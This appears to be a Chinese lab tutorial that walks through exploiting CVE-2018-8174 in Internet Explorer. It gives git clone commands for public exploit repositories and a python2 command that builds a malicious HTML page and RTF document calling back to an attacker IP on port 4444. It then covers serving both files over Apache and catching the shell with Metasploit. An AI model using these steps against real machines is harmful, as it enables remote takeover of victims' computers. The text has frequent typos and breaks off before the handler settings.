在此声明文章仅供相互学习参考,严禁利用于违法犯罪,任何事故自行承担!!
一、背景
0DAY 漏洞,最早的破解是专门针对软件的,叫做 WAREZ,后来才发展到游戏,音乐,影视等其他为容的。0day 中的0表示 zero,早期的 0day 表示在软件发行后的24小时内就出现破解版本,现在我们已经引申了这个含义,只要是在软件或者其他东西发布后,在最短时间内出现相关破解的,都可以叫0day。 0day 是一个统称,所有的破解都可以叫 0day。
CVE-2018-8174 漏洞影响最新版本的IE 浏览器及使用了IE 内核的应用程序。用户在浏览网页或打干 Office 文档时都可能中搭,最终被黑客植入后门木马完全控制电脑。微软在 2018年4月20 日早上角认此漏洞,并于2018年5月8号发布了官方安全补丁,对该 0day漏洞进行了修复,并将其命名为CVE-2018-8174.
二、实施步骤
1.安装CVE-2018-8174的exploit模式
git clone https://github.com/iBearcat/CVE-2018-8174_EXP.git(仓库似乎已经被清空无法下载了) 或git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git
从github中下载CVE-2018-8174的EXP文件
也可以通过xshell,将下载的CVE-2018-8174的EXP文件上传
2.运行其中的python文件,生成恶意的html文件和恶意文档
python2 CVE-2018-8174.py -u http://192.168.47.165/exploit.html -o hack.rtf -i 192.168.47.165 -p 4444(由于该文件的编写的时间原因,要用python2执行)
-u:URL地址,恶意的html文件的访问地址 -o:生成文档
-i:监听地址 -p:监听端口
3.监听靶机打开恶意html文件和恶意文档
将生成的html文件和恶意文档移动到/var/www/html/目录下,然后开启apache服务器,让目标机通过浏览器打开和下载
打开一个新的终端,开启metasploit的exploit/multi/handler模块进行监听
模块信息如下
再下载hack.rtf,用word文档打开